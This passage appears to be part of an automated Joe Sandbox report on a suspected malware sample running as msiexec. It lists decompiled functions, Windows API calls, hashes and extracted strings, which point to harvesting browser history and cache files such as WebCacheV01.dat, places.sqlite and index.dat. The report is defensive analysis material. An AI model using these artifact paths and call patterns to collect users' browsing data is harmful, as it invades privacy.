                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                • API String ID: 3354267031-2114579845
                                                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                                                • String ID: $$8
                                                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1979745280-0
                                                                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProcVersionmemsetwcscpy
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                • API String ID: 4182280571-2036018995
                                                                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                • API String ID: 2641622041-467022611
                                                                                                                                                • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandleSleep
                                                                                                                                                • String ID: }A
                                                                                                                                                • API String ID: 252777609-2138825249
                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d
                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: BINARY
                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2445788494-0
                                                                                                                                                • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                Memory Dump Source
